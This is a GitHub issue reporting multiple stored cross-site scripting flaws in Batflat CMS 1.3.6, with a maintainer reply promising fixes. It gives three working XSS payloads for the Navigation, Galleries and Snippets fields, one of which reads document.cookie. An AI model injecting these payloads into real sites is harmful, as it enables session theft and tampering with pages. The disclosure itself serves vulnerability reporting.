search

sruupl / batflat

Lightweight, fast and easy CMS for free. Bootstrap ready. https://batflat.org
MIT License
135 stars 53 forks source link

Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6 #105

Closed Tadjmen closed 2 years ago

Tadjmen commented 3 years ago

Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6

Login with editor account with rights to Navigation, Galleries, Snippets

Navigation

Add link
payload: "><img src=x onerror=alert(document.cookie)>

image

Code being executed:

image

Galleries

Add gallery
payload: mlem"><svg/onload=alert(1)>

image

Code being executed:

image

Snippets

Add Snippets
payload: mlem"><svg/onload=alert("TuongNC")>

image

Code being executed: image

michu2k commented 2 years ago

Thanks for reporting the problem! Fixes will be available in the next update.